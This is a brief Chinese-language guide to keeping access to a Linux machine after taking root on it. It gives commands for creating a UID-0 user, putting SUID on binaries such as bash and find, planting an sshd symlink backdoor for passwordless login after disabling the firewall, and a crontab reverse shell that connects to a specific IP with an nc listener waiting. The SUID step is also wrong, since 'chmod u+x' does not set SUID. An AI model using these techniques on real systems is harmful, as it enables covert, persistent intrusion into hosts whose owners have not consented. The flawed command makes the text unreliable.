1.添加超级用户
添加超级用户的方式有很多种,这里直接拿到root权限后创建一个用户,在/etc/passwd/中修改用户id值为0。
vim /etc/passwd
2.设置文件SUID权限
Linux提权操作中有个suid提权。在对方主机中查看是否又以下文件·
- Nmap
- Vim
- find
- Bash
- More
- Less
- Nano
- cp
把这些文件加上SUID
chmod u+x 文件
然后就可以利用suid提权来权限维持。
3.ssh软链接
拿到对方的root权限后,关闭防火墙。
建立软链接
ln -sf /usr/sbin/sshd /路径名/su; /路径名/su -oPort=端口号
就可以免密登录。
4.crontab 计划任务反弹shell
得到对方主机权限后,在目录中写入命令执行脚本
bash -i >& /dev/tcp/82.156.145.31/12345 0>&1
然后在计划任务中配置
第一个星号是分钟,这里没有加就是过一会就执行。
然后攻击机开启nc监听
nc -lvvp 12345